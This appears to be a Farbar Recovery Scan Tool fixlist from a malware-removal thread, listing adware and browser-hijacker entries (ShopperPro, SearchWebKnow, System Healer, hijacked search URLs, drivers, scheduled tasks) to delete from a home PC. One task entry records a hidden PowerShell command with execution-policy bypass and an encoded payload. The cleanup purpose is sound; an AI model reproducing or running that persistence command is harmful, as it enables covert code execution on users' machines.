CreateRestorePoint:
HKLM-x32\...\Run: [Registry Helper] => "C:\Program Files (x86)\Registry Helper\RegistryHelper.Exe" /boot
HKLM-x32\...\Run: [LGODDFU] => blrun
HKLM-x32\...\Run: [SPDriver] => C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10650\jsdrv.exe [2720256 2016-03-13] ()
HKLM-x32\...\Run: [YTDownloader] => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [1991600 2015-10-22] (YTDownloader)
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\...\Run: [SPDriver] => C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10650\jsdrv.exe [2720256 2016-03-13] ()
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\...\Run: [YTDownloader] => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [1991600 2015-10-22] (YTDownloader)
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\...\Run: [SearchModule] => C:\Users\FAMILY\AppData\Local\SearchModule\dblaunch.exe [239104 2016-03-06] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1ADB0VXfVBdFElXTwhwJVhKAlEmRFdoLlZP
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.safesearch.net/?utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
HKU\S-1-5-21-2774599765-3218687334-1828580283-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1ADB0VXfVBdFElXTwhwJVhKAlEmRFdoLlZP
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1ADB0VXfVBdFElXTwhwJVhKAlEmRFdoLlZP
HKU\S-1-5-21-2774599765-3218687334-1828580283-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.safesearch.net/?utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
URLSearchHook: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 - (No Name) - {00000000-6E41-4FD3-8538-502F5495E5FC} - No File
SearchScopes: HKLM -> DefaultScope {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKLM -> OldSearch URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKLM -> {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKLM -> {FC0C0170-4EB0-430D-A7F3-939EE7EA1A25} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKLM-x32 -> DefaultScope {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKLM-x32 -> {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> {4B51C980-C6B0-11E1-9136-AED16088709B} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> {A06B1DC8-F08D-4C87-AD5A-B1196D0EEA29} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,
SearchScopes: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> {FC0C0170-4EB0-430D-A7F3-939EE7EA1A25} URL = hxxp://www.safesearch.net/search?q={searchTerms}&utm_medium=ie&utm_campaign=im&utm_source=im&utm_content=1&utm_term=35365DF7DD1942EC
BHO: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro3\ShopperPro364.dll [2016-03-13] ()
BHO-x32: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro3\ShopperPro3.dll [2016-03-13] ()
BHO-x32: Primary Color 1.0.0.7 -> {b0a28f54-b08f-4049-a9bf-8d33bd1e9222} -> C:\Program Files (x86)\Primary Color\PrimaryColorbho.dll [2016-03-09] (Primary Color)
BHO-x32: Search Web Know -> {da8dfa05-93a3-4617-8c86-bbfc625f8fa7} -> C:\Program Files (x86)\Search Web Know\Extensions\da8dfa05-93a3-4617-8c86-bbfc625f8fa7.dll [2016-03-18] ()
Toolbar: HKU\S-1-5-21-2774599765-3218687334-1828580283-1002 -> No Name - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - No File
FF HKLM-x32\...\Firefox\Extensions: [{C7AE725D-FA5C-4027-BB4C-787EF9F8248A}] - C:\Program Files (x86)\PremierOpinion\firefox
CHR HomePage: Default -> hxxp://www-searching.com/?pid=s&s=G3Izgutbl338BA,278cafab-0fe6-4a7c-916e-833be2a0b3e5,&vp=ch&prd=set_ch
CHR RestoreOnStartup: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEmRFdoLlZP"
CHR StartupUrls: Default -> "hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghFcFoAUw8TQxgWdAAMTA0VR1YOeQgJABQVEwcUdAoAAAgSEwQFIk0FA1oDB0VXfV5bFElXTwhwJVhKAlEmRFdoLlZP"
CHR DefaultSearchURL: Default -> hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV8IAgFDF1dBbQwMWA1cFVFFIxQBUAgQDFERcg4MUgEQEFYRcR9aFQQTQkcFME0FBloEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms}
CHR DefaultSearchKeyword: Default -> searchinterneat-a.akamaihd.net
CHR DefaultNewTabURL: Default -> hxxp://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHFMTIwEKV1sTDAAXeQ0VVV0XQhgacQhZTF1DEwIXcwFZUFpDEBNBNARaAktXUUEeJ1pNER8fHGZGIUtbCW4UQ35NL04=
CHR Extension: (Primary Color) - C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Extensions\adoeegiggiebejjakjjpcmcphfjomfcf [2016-03-19] [UpdateUrl: hxxp://wwwgetmyprimaryc-a.akamaihd.net/update/chrome] <==== ATTENTION
CHR Extension: (Search Web Know) - C:\Users\FAMILY\AppData\Local\Google\Chrome\User Data\Default\Extensions\bnmpllcnbecfpaebnjboigkhigfhhbme [2016-03-18] [UpdateUrl: hxxp://cdn.searchwebknow.com/update] <==== ATTENTION
R2 BrsHelper; C:\Program Files (x86)\YTDownloader\BrowserHelperSrv.exe [112560 2015-10-22] ()
R2 brsrv; C:\Users\FAMILY\AppData\Local\brsrv\brsrv.exe [104448 2016-03-06] () [File not signed]
R2 PremierOpinion; C:\Program Files (x86)\PremierOpinion\pmservice.exe [206136 2015-07-21] (VoiceFive, Inc.)
R2 Service Mgr SearchWebKnow; C:\ProgramData\219d5106-5a99-41fd-b942-db6b503b0178\plugincontainer.exe [1408216 2016-03-19] () <==== ATTENTION
R2 SMUpd; C:\Program Files\Common Files\Goobzo\GBUpdate\smu.exe [2460672 2016-03-17] (Search Module Ltd.) [File not signed]
R2 SPBIUpd; C:\Program Files\Common Files\ShopperPro3\spbiu.exe [1224704 2016-03-13] () [File not signed]
R2 Update Mgr SearchWebKnow; C:\Program Files (x86)\Common Files\219d5106-5a99-41fd-b942-db6b503b0178\updater.exe [1271512 2016-03-19] () <==== ATTENTION
S2 Update Primary Color; C:\Program Files (x86)\Primary Color\updatePrimaryColor.exe [664488 2016-03-19] ()
S2 Util Primary Color; C:\Program Files (x86)\Primary Color\bin\utilPrimaryColor.exe [664488 2016-03-19] ()
S2 wbsvc; C:\Program Files\WebBar\wbsvc.exe [28392 2016-03-07] ()
R2 sbmntr; C:\Program Files (x86)\YTDownloader\sbmntr.sys [58528 2015-10-22] (YTDownloader)
R3 SMUpdd; C:\Program Files\Common Files\Goobzo\GBUpdate\smw.sys [43264 2016-03-17] ()
R3 SPBIUpdd; C:\Program Files\Common Files\ShopperPro3\spbiw.sys [43824 2016-03-13] ()
R2 SPDRIVER_1.42.1.10650; C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10650\jsdrv.sys [53048 2016-03-13] ()
R1 {bfca5c75-b8a6-4c3f-a399-5256dde4bfed}Gw64; C:\Windows\System32\drivers\{bfca5c75-b8a6-4c3f-a399-5256dde4bfed}Gw64.sys [48456 2016-03-18] (StdLib)
2016-03-19 10:07 - 2016-03-19 10:08 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{A5D926AB-3667-4A5E-98DC-1C308CE89891}
2016-03-19 09:47 - 2016-03-19 09:48 - 02374144 _____ (Farbar) C:\Users\FAMILY\Downloads\FRST64.exe
2016-03-19 09:37 - 2016-03-19 09:37 - 00098971 _____ C:\Users\FAMILY\SparkTrust PC Cleaner Plus-Log-19-03-16-09-36-07.zip
2016-03-19 08:52 - 2016-03-19 09:41 - 00000000 ____D C:\ProgramData\SparkTrust
2016-03-19 08:52 - 2016-03-19 08:52 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\SparkTrust
2016-03-19 08:51 - 2016-03-19 08:52 - 11135784 _____ (SparkTrust) C:\Users\FAMILY\Downloads\SparkTrust PC Cleaner Plus Setup_E6F3D806-BF70-445B-B4A3-CFD5FDF9C899_.exe
2016-03-19 07:00 - 2016-03-19 07:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PremierOpinion
2016-03-19 06:58 - 2015-07-21 17:19 - 01084728 _____ (VoiceFive, Inc.) C:\WINDOWS\system32\pmls64.dll
2016-03-19 06:58 - 2015-07-21 17:19 - 00733496 _____ (VoiceFive, Inc.) C:\WINDOWS\SysWOW64\pmls.dll
2016-03-18 21:44 - 2016-03-18 21:44 - 00000000 ____D C:\Users\UpdatusUser\AppData\Local\Google
2016-03-18 21:43 - 2016-03-19 08:26 - 00000298 _____ C:\WINDOWS\Tasks\One System CarePeriod.job
2016-03-18 21:43 - 2016-03-18 22:37 - 00000000 ____D C:\Users\FAMILY\AppData\Local\WebBar
2016-03-18 21:43 - 2016-03-18 21:48 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\One System Care
2016-03-18 21:43 - 2016-03-18 21:43 - 00003850 _____ C:\WINDOWS\System32\Tasks\WebBarUpdateTask
2016-03-18 21:43 - 2016-03-18 21:43 - 00003688 _____ C:\WINDOWS\System32\Tasks\One System Care Task
2016-03-18 21:43 - 2016-03-18 21:43 - 00003422 _____ C:\WINDOWS\System32\Tasks\One System Care Run Delay
2016-03-18 21:43 - 2016-03-18 21:43 - 00003352 _____ C:\WINDOWS\System32\Tasks\One System Care Monitor
2016-03-18 21:43 - 2016-03-18 21:43 - 00003324 _____ C:\WINDOWS\System32\Tasks\WebBarLaunchTask
2016-03-18 21:43 - 2016-03-18 21:43 - 00002928 _____ C:\WINDOWS\System32\Tasks\One System CarePeriod
2016-03-18 21:43 - 2016-03-18 21:43 - 00001140 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\ProgramData\49232d2d-6c63-1
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\ProgramData\49232d2d-3c63-0
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\Program Files\WebBar
2016-03-18 21:43 - 2016-03-18 21:43 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-03-18 21:42 - 2016-03-19 15:04 - 00000000 ____D C:\Program Files (x86)\PremierOpinion
2016-03-18 21:41 - 2016-03-19 13:41 - 00000000 ____D C:\ProgramData\219d5106-5a99-41fd-b942-db6b503b0178
2016-03-18 21:41 - 2016-03-19 10:36 - 00000000 ____D C:\Program Files (x86)\Search Web Know
2016-03-18 21:41 - 2016-03-19 09:22 - 00002115 _____ C:\Users\FAMILY\Desktop\Hotmail.lnk
2016-03-18 21:41 - 2016-03-18 21:41 - 00003580 _____ C:\WINDOWS\System32\Tasks\IBUpd
2016-03-18 21:41 - 2016-03-18 21:41 - 00003326 _____ C:\WINDOWS\System32\Tasks\IBUpd2
2016-03-18 21:41 - 2016-03-18 21:41 - 00002426 _____ C:\Users\FAMILY\Desktop\BrowserAir.lnk
2016-03-18 21:41 - 2016-03-18 21:41 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BrowserAir
2016-03-18 21:41 - 2016-03-18 21:41 - 00000000 ____D C:\Users\FAMILY\AppData\Local\SearchModule
2016-03-18 21:41 - 2016-03-18 21:41 - 00000000 ____D C:\Users\FAMILY\AppData\Local\brsrv
2016-03-18 21:40 - 2016-03-18 21:41 - 00000000 ____D C:\Users\FAMILY\AppData\Local\BrowserAir
2016-03-18 21:40 - 2016-03-18 12:24 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{bfca5c75-b8a6-4c3f-a399-5256dde4bfed}Gw64.sys
2016-03-18 21:39 - 2016-03-18 21:40 - 00480576 _____ C:\Users\FAMILY\Downloads\adobe_flash_player-92129127.exe
2016-03-18 21:39 - 2016-03-18 21:40 - 00000000 ____D C:\Users\FAMILY\AppData\Local\BrowserHelper
2016-03-18 21:38 - 2016-03-19 08:28 - 00000294 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-03-18 21:38 - 2016-03-19 08:26 - 00000294 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-03-18 21:38 - 2016-03-19 08:26 - 00000000 ____D C:\Program Files (x86)\Primary Color
2016-03-18 21:38 - 2016-03-18 21:43 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\System Healer
2016-03-18 21:38 - 2016-03-18 21:38 - 00023852 _____ C:\WINDOWS\System32\Tasks\{0A7D0E47-0C0A-0B7F-0A11-0F0A0E0C1178}
2016-03-18 21:38 - 2016-03-18 21:38 - 00004464 _____ C:\WINDOWS\System32\Tasks\ShopperPro3
2016-03-18 21:38 - 2016-03-18 21:38 - 00004416 _____ C:\WINDOWS\System32\Tasks\SPBIW_UpdateTask_Time_323732333831323538362d454a2a415034412a4a6c575a
2016-03-18 21:38 - 2016-03-18 21:38 - 00004414 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_323732333831323538362d454a2a415034412a4a6c575a
2016-03-18 21:38 - 2016-03-18 21:38 - 00004016 _____ C:\WINDOWS\System32\Tasks\YTDownloaderUpd
2016-03-18 21:38 - 2016-03-18 21:38 - 00003688 _____ C:\WINDOWS\System32\Tasks\YTDownloader
2016-03-18 21:38 - 2016-03-18 21:38 - 00003684 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-03-18 21:38 - 2016-03-18 21:38 - 00003596 _____ C:\WINDOWS\System32\Tasks\SPDriver
2016-03-18 21:38 - 2016-03-18 21:38 - 00003412 _____ C:\WINDOWS\System32\Tasks\SystemHealer Run Delay
2016-03-18 21:38 - 2016-03-18 21:38 - 00003342 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2016-03-18 21:38 - 2016-03-18 21:38 - 00002920 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-03-18 21:38 - 2016-03-18 21:38 - 00002626 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-03-18 21:38 - 2016-03-18 21:38 - 00002022 _____ C:\Users\FAMILY\Desktop\YTDownloader.lnk
2016-03-18 21:38 - 2016-03-18 21:38 - 00001128 _____ C:\Users\Public\Desktop\Launch System Healer.lnk
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Users\FAMILY\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Users\Public\Documents\ShopperPro3
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\ShopperPro3
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\SearchModule
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\87d4b359-6c95-1
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\ProgramData\87d4b359-41b3-0
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files\Common Files\ShopperPro3
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files\Common Files\Goobzo
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files (x86)\YTDownloader
2016-03-18 21:38 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2016-03-18 21:37 - 2016-03-18 21:38 - 00000000 ____D C:\Program Files (x86)\ShopperPro3
2016-03-18 21:37 - 2016-03-18 21:37 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-03-18 21:37 - 2016-03-18 21:37 - 00003682 _____ C:\WINDOWS\System32\Tasks\ShopperProJSUpd
2016-03-18 21:37 - 2016-03-18 21:37 - 00000000 ____D C:\Users\FAMILY\AppData\Local\Setup Wizard
2016-03-18 21:37 - 2016-03-18 21:37 - 00000000 ____D C:\ProgramData\SoftMedia
2016-03-18 21:37 - 2016-03-18 21:37 - 00000000 ____D C:\Program Files (x86)\SoftMedia
2016-03-18 21:34 - 2016-03-18 21:35 - 00689768 _____ C:\Users\FAMILY\Downloads\Setup.exe
2016-03-17 22:03 - 2016-03-17 22:03 - 01035736 _____ ( ) C:\Users\FAMILY\Downloads\FlashPlayerPro.exe
2016-03-17 11:00 - 2016-03-17 11:00 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{3A8B57C3-1388-424F-892A-A7989FFB83E9}
2016-03-16 03:37 - 2016-03-16 13:20 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{FC678396-2C29-4B63-919F-016CF8D8C544}
2016-03-15 11:31 - 2016-03-15 11:32 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{7BC9D032-BB74-4A54-9F42-5031DB07FA39}
2016-03-13 19:56 - 2016-03-13 19:57 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{8B32A798-574F-4191-8E63-29B15862C3E4}
2016-03-12 20:38 - 2016-03-12 20:38 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{2075560F-C5F5-43B9-9B4B-D351C4D0114C}
2016-03-11 20:15 - 2016-03-11 20:15 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{D051106C-CFBB-4097-808C-018B33D9339E}
2016-03-06 20:20 - 2016-03-06 20:21 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{8C656ABB-D4CC-43A4-BF04-30774B72D2A7}
2016-03-06 08:19 - 2016-03-06 08:19 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{2F2C7842-F93F-4355-A450-7C4534C2F74A}
2016-03-04 20:00 - 2016-03-04 20:00 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{6D6BE7B4-A4CD-4DDB-8DA6-8E834783672A}
2016-03-04 08:00 - 2016-03-04 08:00 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{E74F5156-2120-4CC8-BDE8-E3A05410ABEC}
2016-03-03 14:32 - 2016-03-03 14:32 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{E3DE45D6-39B4-4F0B-A444-492AE5F3B19B}
2016-03-02 12:16 - 2016-03-02 12:16 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{F78ECBB2-6309-45E2-807F-294500728105}
2016-02-28 21:35 - 2016-02-28 21:36 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{01359F7D-497D-4E15-8130-DBD883D522B8}
2016-02-28 09:35 - 2016-02-28 09:35 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{53EEFCC1-E53C-4DAA-98BD-10821C39B60A}
2016-02-27 21:34 - 2016-02-27 21:34 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{9345F8B4-B4F1-4304-9510-FFC5D04831EA}
2016-02-23 18:53 - 2016-02-27 09:34 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{906F93F9-44E4-4ABC-B479-CE3C5A765449}
2016-02-22 08:40 - 2016-02-22 08:40 - 00000000 ____D C:\Users\FAMILY\AppData\Local\{CF64107B-FC5B-490C-9359-2EAFBA1C89ED}
Task: {03016FFF-6F21-4267-853D-9DAB71D38A2B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {0E33F4C2-463A-45A1-B51B-386A14865DED} - System32\Tasks\WebBarUpdateTask => C:\Program Files\WebBar\wbsvc.exe [2016-03-07] () <==== ATTENTION
Task: {1811C626-5A3C-4E9C-9FB1-6F74E2A4A1A3} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {192EA388-3346-42C7-B900-0474B7343F21} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {2CB9B203-726D-475D-A439-809CD63C2418} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {381F786B-B520-4AF6-9127-B09CE2DD36A1} - System32\Tasks\ShopperProJSUpd => C:\Program Files (x86)\ShopperPro3\updater.exe [2016-03-13] (Goobzo) <==== ATTENTION
Task: {3A1A7413-1639-41FD-B034-7EBBAB235169} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [2015-10-22] (YTDownloader) <==== ATTENTION
Task: {3A1E8671-AD59-4273-9EAF-BDC4BDE609B8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {4052BF58-01E0-4281-A086-2B04CF49BBF1} - System32\Tasks\System HealerPeriod => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-03-15] ()
Task: {45606527-716E-489B-91F6-03980CBF99FE} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-03-15] () <==== ATTENTION
Task: {456F07E5-2DF2-48E4-91A0-62F18BE52403} - System32\Tasks\System HealerStartUp => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-03-15] ()
Task: {4F6B583E-88CA-48AC-92E5-414ABEB54A23} - System32\Tasks\ShopperPro3 => C:\Program Files (x86)\ShopperPro3\ShopperPro3.exe [2016-03-13] (Goobzo LTD) <==== ATTENTION
Task: {4F9DF11E-C5A7-4C0B-828E-45C7E1423E8B} - System32\Tasks\IBUpd => C:\Users\FAMILY\AppData\Local\BrowserAir\47.0.0.5\updater.exe [2016-02-14] () <==== ATTENTION
Task: {51C10DAB-B894-4716-8E75-E32DB45B2030} - System32\Tasks\IBUpd2 => C:\Users\FAMILY\AppData\Local\BrowserAir\47.0.0.5\updater.exe [2016-02-14] () <==== ATTENTION
Task: {5D0125A3-917F-49AC-8224-D2B66AA1C3BB} - System32\Tasks\{0A7D0E47-0C0A-0B7F-0A11-0F0A0E0C1178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAA7ADsAOwAgADsAIAA7ACAAOwA7ADsAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkAbgBnAFAAcgBlAGYAZQByAGUA (the data entry has 9688 more characters).
Task: {67E3D420-5B61-4BD5-955E-808DEEE23A20} - System32\Tasks\SPDriver => C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10650\jsdrv.exe [2016-03-13] () <==== ATTENTION
Task: {689153DE-E555-4A6F-BDAC-0229A43A6D08} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe [2016-03-15] ()
Task: {6A9AEF73-E366-4B84-BA5F-662C8A76EEF5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {7167878C-2073-4943-97AA-FE6914A30D20} - System32\Tasks\SPBIW_UpdateTask_Time_323732333831323538362d454a2a415034412a4a6c575a => Wscript.exe //B "C:\ProgramData\ShopperPro3\spbihe.js" spbiu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {755E496D-BD8D-4372-B348-EC8C032C7202} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {78148991-BE7C-451F-AD1E-E8D83D63D3A7} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {7AE60F6B-ABED-44DC-8E74-6EF2BB71870F} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {83BA0469-7E24-4680-9486-64CD93A7F7A3} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe [2016-03-15] ()
Task: {953989AB-679E-4994-8742-CC02E3555904} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {9AEE213D-98C5-4287-BB5F-17F06172B55D} - System32\Tasks\SMW_UpdateTask_Time_323732333831323538362d454a2a415034412a4a6c575a => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ATTENTION
Task: {A1A75FB4-850D-4C19-95D0-1F3C3D441631} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-03-15] () <==== ATTENTION
Task: {AD3000D1-3AF5-44C4-825A-F5F1EDE936B6} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {BB038315-32CB-4C1D-B912-3CB0A51B24C4} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-03-15] () <==== ATTENTION
Task: {BC654DE0-FD27-4519-96AE-2A1E6E0BE557} - System32\Tasks\YTDownloaderUpd => C:\Program Files (x86)\YTDownloader\updater.exe [2015-10-22] (Goobzo) <==== ATTENTION
Task: {BE803180-2024-4EF1-BF8C-72972D1162BE} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-03-15] () <==== ATTENTION
Task: {F73C70C6-6079-47D2-9C52-98A774707E27} - System32\Tasks\WebBarLaunchTask => C:\Program Files\WebBar\wbsvc.exe [2016-03-07] () <==== ATTENTION
Task: {FDC46E98-8D63-448D-96DC-5EA845E8BE0A} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\One System CarePeriod.job => <==== ATTENTION
Task: C:\WINDOWS\Tasks\System HealerPeriod.job =>
Task: C:\WINDOWS\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe
